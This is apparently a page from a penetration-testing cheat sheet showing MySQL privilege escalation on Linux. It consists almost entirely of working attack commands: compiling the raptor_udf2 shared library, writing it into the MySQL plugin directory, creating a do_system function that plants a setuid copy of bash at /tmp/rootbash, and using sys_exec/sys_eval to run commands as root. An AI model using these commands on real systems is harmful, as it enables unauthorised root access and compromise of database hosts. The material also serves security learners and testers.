Mysql
1
gcc -g -c raptor_udf2.c -fPIC
2
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
3
​
4
mysql -u root
5
​
6
use mysql;
7
create table foo(line blob);
8
insert into foo values(load_file('/home/raptor_udf2.so'));
9
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
10
create function do_system returns integer soname 'raptor_udf2.so';
11
​
12
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
13
​
14
exit
15
​
16
[email protected]$ /tmp/rootbash -p
Copied!
MYSQL running as root :
1
mysql -u root
2
​
3
select sys_exec('whoami');
4
select sys_eval('whoami');
5
​
6
/* If function doesnt exist, create the function */
7
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
8
​
9
if NULL returns, try redirecting the errors
10
select sys_eval('ls /root 2>&1');
Copied!
Last modified 7mo ago
Copy link